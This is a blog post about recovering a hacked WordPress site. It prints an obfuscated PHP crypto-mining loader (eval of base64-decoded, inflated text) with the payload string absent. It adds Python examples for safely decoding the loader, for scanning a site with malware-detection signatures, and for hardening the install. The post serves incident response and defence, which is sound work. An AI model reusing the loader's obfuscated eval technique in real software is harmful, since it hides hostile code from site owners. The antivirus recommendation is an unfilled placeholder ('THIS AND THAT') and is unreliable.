In the last 24 hours, I have been the unfortunate recipient of a hacked WordPress site. Thankfully the site was non-critical and certainly not very popular. So rather than rush to restore the site, I’m taking the opportunity to understand firstly what was exploited to make this hack possible and secondly the remedy to stop this happening again.

The hack

Firstly, about the hack itself. Running a Google search on some of the source code left in the hackers' files, I found out about crypto-mining malware for CoinHive. The source code matched; however, everything I found was about Drupal rather than WordPress, and mostly about JavaScript code, whereas this hack was done with PHP, as you can see below:

<?php
// Stage 1: derive the key. Inside eval(), __LINE__ counts lines of the evaluated
// string, and the leading "\n" puts this on line 2, so the key is always 2 * 337 = 674.
eval("\n\$dgreusdi = intval(__LINE__) * 337;");
// Stage 2: the payload, base64 text with every "E" swapped for the key to evade naive base64 scanners.
$a = "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";
// Stage 3: restore the "E"s, base64-decode, inflate and execute the real code.
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));

This is the loader for the crypto-mining script rather than the miner itself. You cannot tell what it does by reading it because the real code is hidden inside the string: the last line base64-decodes it, inflates it and hands the result to eval(). That layering exists to defeat simple signature scans, and it also means you should never run such a file to see what it does; decode the string offline instead. The motive is straightforward. The payload spends your server's CPU (or, with the JavaScript variants, your visitors' browsers) mining crypto-currency for the attacker: miners are rewarded for being the first to verify a block of transactions and append it to the blockchain, so every compromised website is free compute, and the incentive is simply money.
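The safe way to see what a loader like this executes is to reverse its encoding rather than run it. The block below is an added example, not code from the post or from the malware: it re-creates the loader's three-step encoding (raw deflate, base64, every "E" replaced by the numeric key) on a constructed benign payload, then reverses it with nothing but decoding calls. The key value 674 is derived from the loader's own lines (2 * 337); the payload string on the page is not reproduced, so the sample payload here is an assumption.

```python
import base64
import re
import zlib

# Inside eval(), __LINE__ counts lines of the evaluated string, and the loader
# starts that string with "\n", so the assignment sits on line 2 of it:
# the key is always 2 * 337, whatever line the loader occupies in the file.
KEY = 2 * 337

# Shape of the outer loader: eval(<decoder>(<decoder>(...)))
LOADER_RE = re.compile(
    rb'eval\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(', re.I)


def php_gzdeflate(data: bytes) -> bytes:
    """PHP gzdeflate(): raw DEFLATE stream without a zlib header (wbits=-15)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def php_gzinflate(data: bytes) -> bytes:
    """PHP gzinflate(): inverse of php_gzdeflate()."""
    return zlib.decompress(data, -15)


def obfuscate(php_source: bytes, key: int = KEY) -> str:
    """Re-create the loader's encoding so the decoder can be tested end to end:
    deflate -> base64 -> replace every 'E' with the numeric key."""
    b64 = base64.b64encode(php_gzdeflate(php_source)).decode('ascii')
    return b64.replace('E', str(key))


def deobfuscate(blob: str, key: int = KEY) -> bytes:
    """Reverse the loader without executing anything. It shares the loader's own
    weakness: a genuine '674' in the base64 text would be mangled as well."""
    b64 = blob.replace(str(key), 'E')
    return php_gzinflate(base64.b64decode(b64))


def is_nested_loader(php_source: bytes) -> bool:
    """True if the decoded payload is itself another eval(decode(...)) layer,
    i.e. you need to unwrap again rather than read it."""
    return LOADER_RE.search(php_source) is not None


if __name__ == '__main__':
    # Constructed, benign stand-in for the payload string on the page.
    sample = b"<?php echo 'constructed benign payload'; ?>"
    blob = obfuscate(sample)
    print('encoded :', blob)
    print('decoded :', deobfuscate(blob).decode())
    print('nested  :', is_nested_loader(deobfuscate(blob)))
```

Real droppers often wrap several of these layers; keep calling deobfuscate() while is_nested_loader() reports another eval, and only read the final plain PHP. Doing the same in PHP by swapping eval for echo works too, but a typo there executes the payload, which is why the decoder is kept in a language that cannot run it.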

The vulnerability

Concerned about the potential impact to the WordPress community, having only found information about vulnerabilities in Drupal being exploited to achieve this hack, I reached out on WordPress StackExchange and the WordPress.org Support Forums. I was honestly surprised by the response! My understanding was that this was an exploitation of WordPress, a plugin or a theme, but nobody was interested in where the vulnerability was; just patch it up and add more layers of protection was the response I received.

From my point of view, the location of the vulnerability points towards the Contact Form 7 plugin, because one of the crypto-mining scripts was uploaded to the directory of this plugin. So, in the meantime, I'll be investigating this plugin and any vulnerabilities that could be exploited to upload malware to the web server (I am much more interested in the "how" than the StackExchange or WordPress.org communities were).

The resolution

Inevitably, I do need to restore this site, and on WordPress.org there are two great articles you can read on how to recover from a hacked WordPress site, and how to harden your WordPress site to reduce the chances of it being hacked again.

Step 1: Find the infection

The security scan is the most important part of restoring your hacked website: it is what tells you which files were dropped or altered, and without it your headache could happen all over again. Bear in mind that a scan finds the infection, not necessarily the vulnerability that let it in, and the directory a file was dropped into does not by itself identify the entry point, since anything that can write to the web root can write anywhere under it. Check your web server access logs for the first requests to the dropped filenames; the requests immediately before them usually show how the attacker got in.

When choosing the scanning software, you are going to need something server-side so that it can see all of the website files. For that reason I can recommend Cerber Security, Sucuri Security or Wordfence Security, all of which are plugins for WordPress that will help you discover infections now and in the future, should they occur. One caveat: a plugin runs inside the same PHP site that has been compromised, so malware with write access can blind or disable it. A scan from outside the site (your host's scanner, or a copy of the files pulled down to another machine) is harder to tamper with.

I also recommend that you check whether your website hosting provider offers a security scanning service. I host with 1&1, and it was their automated security scanning service that first alerted me to the website hack and, crucially, neutralised it automatically as well.

Your computer could be infected!

This is unfortunately true. Your computer could be carrying the same infection, or it could be that a compromise of your computer is what gave the hackers access to your website in the first place (for example by sniffing FTP login credentials, which FTP sends in clear text, or by logging your keystrokes). Consequently, you should run anti-virus and anti-malware scans on your computer immediately. I can recommend THIS AND THAT, which have free 30 day trials so you don't even need to pay for it.

Don’t progress until your scanning is complete!

Imagine the hackers can see every time you log in to any web server via FTP and capture both your username and password. That is why you do not move forward until the scanning is complete: there is no point changing your passwords from a machine that is still leaking them, because the new ones will be captured too.

Step 2: Fix the infection

Your security scan will often suggest a resolution to the infection it finds, so obviously I recommend following its advice. However, in the case of the CoinHive crypto-jacking malware infection I experienced, I was simply able to remove the following 4 files that were found by the security scan:

  • l9qlraeng.php
  • 7adotrr28g.php
  • y04tqyl3fu.php
  • co4q736bga.php

Clearly, the names of these files are randomly generated, so if you experience the same hack the filenames will be different. Look for the pattern (short lower-case names mixing letters and digits, in places where no plugin would legitimately write PHP) rather than for the names themselves.

Whatever kind of hack you experience, you are going to need to either clean the files that have been altered or clean the database (or both). To find out more about what to do in these situations you can read:

Where you are at this point really depends on how severe the infection was. You may well have cleaned it, and if you think you have, run your security scans again. Unfortunately, it is still possible that remnants (and the vulnerability) remain in your website, which is why I recommend that you continue to Step 3.
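Steps 1 and 2 above come down to finding files that should not be there, and a plugin scan is not the only way to do that. The script below is an added example, not code from the post or from any of the plugins named: a triage walk over a WordPress tree that flags the four things this incident showed (PHP under uploads, recent modification, random-looking filenames like the ones listed above, and the eval/gzinflate/base64_decode obfuscation signatures). The signature list and the file-name pattern are assumptions drawn from this page, not a complete rule set; the miniature site it builds for a stand-alone run is constructed.

```python
import os
import re
import tempfile
import time

PHP_EXT = ('.php', '.phtml', '.php5', '.php7', '.phar')

# Content signatures typical of droppers and web shells. Assumed starting
# set, not a complete one; extend it with whatever your own incident shows.
SIGNATURES = {
    'eval-of-decoded-payload': re.compile(
        rb'eval\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(', re.I),
    'chained-decoders': re.compile(
        rb'(gzinflate|gzuncompress|str_rot13)\s*\(\s*base64_decode\s*\(', re.I),
    'dynamic-code-from-variable': re.compile(
        rb'(create_function|assert)\s*\(\s*\$', re.I),
    'long-hex-escaped-string': re.compile(rb'(\\x[0-9a-fA-F]{2}){12,}'),
}

# The dropped files on this page were named like l9qlraeng.php: short,
# lower-case, letters and digits mixed, no hyphen or underscore.
RANDOM_NAME_RE = re.compile(r'^(?=.*\d)[a-z0-9]{8,12}\.php$')


def scan_site(root, days=7, now=None):
    """Walk a WordPress tree; return {path: [reasons]} for files worth a manual look."""
    root = os.path.abspath(root)
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    uploads = os.path.join(root, 'wp-content', 'uploads') + os.sep
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            # 1. WordPress never stores PHP under uploads; anything there was
            #    put there by hand or by malware.
            if path.startswith(uploads):
                reasons.append('php-in-uploads')
            # 2. Recent change. Caveat: attackers can reset mtime with touch(),
            #    so an old timestamp proves nothing.
            if os.path.getmtime(path) >= cutoff:
                reasons.append('modified-in-last-%d-days' % days)
            # 3. Random-looking file name.
            if RANDOM_NAME_RE.match(name):
                reasons.append('random-looking-name')
            # 4. Obfuscation signatures in the content.
            with open(path, 'rb') as fh:
                data = fh.read()
            for label, rx in SIGNATURES.items():
                if rx.search(data):
                    reasons.append(label)
            if reasons:
                findings[path] = reasons
    return findings


def make_sample_site():
    """Constructed miniature WordPress tree for a stand-alone run: one dropper
    shaped like the loader on this page, one clean core file with an old mtime."""
    root = tempfile.mkdtemp(prefix='wp-triage-')
    dropper = os.path.join(root, 'wp-content', 'uploads', '2018', '03', 'l9qlraeng.php')
    clean = os.path.join(root, 'wp-includes', 'clean.php')
    os.makedirs(os.path.dirname(dropper))
    os.makedirs(os.path.dirname(clean))
    with open(dropper, 'wb') as fh:
        fh.write(b'<?php\n$a = "...";\neval(gzinflate(base64_decode($a)));\n')
    with open(clean, 'wb') as fh:
        fh.write(b'<?php\nfunction clean_helper() { return 1; }\n')
    old = time.time() - 30 * 86400
    os.utime(clean, (old, old))
    return root, dropper, clean


if __name__ == '__main__':
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else make_sample_site()[0]
    for path, reasons in sorted(scan_site(root).items()):
        print('%-40s %s' % (', '.join(reasons), path))
```

Run it against a copy of the site pulled to a clean machine rather than on the compromised host, and treat the output as a reading list, not a verdict: a hit means open the file, and a clean run means only that none of these heuristics fired. For WordPress core files, comparing against the official checksums (WP-CLI's wp core verify-checksums does this) catches modifications that carry none of these signatures.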

Step 3: Change your usernames & passwords

How strong are your usernames and passwords? A username is not a secret, but the default "admin" is the first thing brute-force tools try, so change it wherever you can. You may not be able to change the usernames for your FTP or MySQL database accounts, but you certainly can for WordPress WP Admin access and your own computer!

  1. Change usernames where possible for FTP, MySQL databases, WordPress WP Admin & your own computer
  2. Change the passwords for these users as well (using long, complex & unique phrases) – use the LastPass password generator tool, and remember that a new MySQL password must also go into wp-config.php
  3. Regenerate the secret keys and salts in wp-config.php (the AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY and NONCE_KEY lines and their SALT counterparts, fresh values from https://api.wordpress.org/secret-key/1.1/salt/) – this invalidates every existing login cookie, including any the attacker still holds

Step 4: Maintenance mode

If your live website is still down, then I highly recommend placing it in maintenance mode, so that visitors are told that maintenance is going on rather than getting a broken or infected page. You can do this manually by creating the ".maintenance" file in the website root and the "maintenance.php" file in the "wp-content" folder (read "How to manually enable and customize maintenance mode in WordPress" on Hostpapa for some help on this), or you can use a plugin such as Maintenance Mode, which is my favourite.

Step 5: Start again

I'm going to take a copy of my hacked site so that I can further investigate how the hack might have occurred; it is also a worthwhile backup from which to extract certain files when you need them.
However, I'm then going to create a fresh version of my website by:

  1. Creating a new database
  2. Installing the latest version of WordPress (from a fresh download)
  3. Installing the same theme & plugins that I had before (again, from fresh downloads)
  4. Then, most importantly, running a security scan of all the website files (and, for core, verifying them against the official checksums; WP-CLI's "wp core verify-checksums" does this)

Do not do this on your live web server!

It is possible that the vulnerability exists in a theme or plugin you have installed, so you really do not want to put it back on your public web server. Instead, rebuild on a web server that is offline (your local server will do fine) and, when you have finished re-creating your site, put it live. Before you do, check each theme and plugin's changelog for security fixes and update it: a fresh download of the same version carries the same hole.

Use version control!

It is in a situation like this that version control (such as Git or SVN) pays dividends. You should use version control for your theme (if it is bespoke or a child theme) at the very least; this is usually sufficient, as everything else (WordPress core, plugins and parent themes) can simply be downloaded and installed again. It also gives you a trustworthy baseline: a diff against the last clean commit shows exactly which lines were injected, which is far quicker than reading every file.

Step 6: Harden WordPress

What can you do to stop this from happening again? It is the most important question: lessons have been learnt and it's time to harden your website security. Here are my recommendations on how to do that:

  1. Security scanning & alerts: Install Cerber Security, Sucuri Security or Wordfence Security
  2. Clean-up: Remove obsolete themes & plugins
  3. Limit access: Remove redundant user accounts
  4. Change usernames & passwords: For all accounts you decide to keep
  5. Schedule backups: Schedule backups of your database & website files on at least a daily basis to another location (i.e. not the same server that your website is on) using UpdraftPlus, and keep enough history to go back to before a compromise was detected, not just the last night's copy
  6. Update everything, then keep updating: Manually update WordPress core, all themes & plugins and then check everything on your site to be sure it is working as you expect. Leave the default automatic updates for minor core releases switched on, since those are the ones that carry security fixes, and schedule a day every month when you log in to the WP Admin and apply major core, theme & plugin updates
  7. Set permissions: Set the recommended permissions for WordPress folders & files (see “Core Directories / Files” on WordPress.org)
  8. Secure wp-admin: Secure the “wp-admin” folder with password protection by following “How to Password Protect Your WordPress Admin (wp-admin) Directory” on wpbeginner – be sure to follow “Update: Here is how to fix the Admin Ajax Issue” as well
  9. Obfuscate wp-login: Use the Cerber Security plugin to change the login page URL from "wp-login.php" to some other random name; this cuts the noise from automated brute-force bots, but it is obscurity rather than a secret, so keep the strong passwords and login protection from the other steps
  10. Protect wp-includes: Protect the “wp-includes” folder by updating the .htaccess file in the website root as per “WP-Includes” on WordPress.org
  11. Protect uploads: Protect the “uploads” folder by creating an .htaccess file in the “uploads” folder as per “WP-Content/Uploads” on WordPress.org
  12. Protect wp-config: Protect the “wp-config.php” file by updating the .htaccess file in the website root as per “WP-Config.php” on WordPress.org
  13. Disable file editing: Disable the theme and plugin file editor in the WP Admin by adding define('DISALLOW_FILE_EDIT', true); to "wp-config.php" above the "stop editing" line, so that a stolen admin login cannot be turned into arbitrary PHP on the server
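Items 7 and 10 to 13 above are all file changes on the server, and they are the ones you will want to re-apply after every rebuild. The script below is an added example, not code from the post: it applies the permission baseline, writes an uploads .htaccess that denies PHP execution, appends the wp-config.php denial and the WordPress.org include-only rewrite rules to the root .htaccess inside markers so it can be re-run safely, and inserts DISALLOW_FILE_EDIT where it must go. It assumes Apache 2.4 syntax ("Require all denied"; Apache 2.2 uses "deny from all"), a host where .htaccess is honoured (nginx ignores it), and running as the file owner; the minimal install it builds for a stand-alone run is constructed.

```python
import os
import stat
import tempfile

# Apache 2.4 syntax assumed; on 2.2 replace "Require all denied" with "deny from all".
UPLOADS_HTACCESS = r"""# Deny execution of any PHP file stored under uploads
<FilesMatch "\.(php|phtml|php[0-9]?|phps|phar)$">
    Require all denied
</FilesMatch>
"""

# wp-config.php denial plus the WordPress.org "block the include-only files"
# rewrite rules. Wrapped in markers so the function can be re-run safely.
ROOT_HTACCESS_BLOCK = r"""# BEGIN hardening
<Files wp-config.php>
    Require all denied
</Files>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>
# END hardening
"""


def disable_file_edit(cfg_path):
    """Add define('DISALLOW_FILE_EDIT', true); to wp-config.php if absent.
    It must run before wp-settings.php is loaded, so it is inserted ahead of
    the "stop editing" marker rather than appended. Returns True if changed."""
    with open(cfg_path) as fh:
        lines = fh.readlines()
    if any('DISALLOW_FILE_EDIT' in line for line in lines):
        return False
    marker = [i for i, line in enumerate(lines) if 'stop editing' in line]
    if not marker:
        raise ValueError('no "stop editing" marker in %s' % cfg_path)
    lines.insert(marker[0], "define('DISALLOW_FILE_EDIT', true);\n")
    with open(cfg_path, 'w') as fh:
        fh.writelines(lines)
    return True


def write_htaccess(root):
    """Write the uploads .htaccess and append the root block exactly once."""
    uploads = os.path.join(root, 'wp-content', 'uploads')
    os.makedirs(uploads, exist_ok=True)
    with open(os.path.join(uploads, '.htaccess'), 'w') as fh:
        fh.write(UPLOADS_HTACCESS)
    root_ht = os.path.join(root, '.htaccess')
    existing = ''
    if os.path.exists(root_ht):
        with open(root_ht) as fh:
            existing = fh.read()
    if '# BEGIN hardening' not in existing:
        with open(root_ht, 'a') as fh:
            fh.write(ROOT_HTACCESS_BLOCK)


def set_permissions(root):
    """WordPress.org baseline: directories 755, files 644, wp-config.php 600."""
    for dirpath, _dirs, files in os.walk(root):
        os.chmod(dirpath, 0o755)
        for name in files:
            os.chmod(os.path.join(dirpath, name), 0o644)
    os.chmod(os.path.join(root, 'wp-config.php'), 0o600)


def harden(root):
    changed = disable_file_edit(os.path.join(root, 'wp-config.php'))
    write_htaccess(root)
    set_permissions(root)  # last, so the files written above get the right mode
    return changed


def file_mode(path):
    return stat.S_IMODE(os.stat(path).st_mode)


def make_skeleton():
    """Constructed minimal install for a stand-alone run: just a wp-config.php."""
    root = tempfile.mkdtemp(prefix='wp-harden-')
    os.makedirs(os.path.join(root, 'wp-includes'))
    with open(os.path.join(root, 'wp-config.php'), 'w') as fh:
        fh.write("<?php\ndefine('DB_NAME', 'wp');\n"
                 "/* That's all, stop editing! Happy blogging. */\n"
                 "require_once ABSPATH . 'wp-settings.php';\n")
    return root


if __name__ == '__main__':
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else make_skeleton()
    print('DISALLOW_FILE_EDIT added:', harden(root))
    print('wp-config.php mode: %o' % file_mode(os.path.join(root, 'wp-config.php')))
```

Two caveats before running it on a real install: the include-only rewrite rules are the ones WordPress.org documents for single sites and break Multisite's ms-files.php image handling, so drop that part of the block there; and if PHP runs as a different user from the file owner (a mod_php setup), 600 on wp-config.php will stop WordPress reading it, in which case 640 with the web server's group is the closest safe setting.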

Step 7: ?

What else would you do? Do you have any recommendations? Let me know in the comments below…
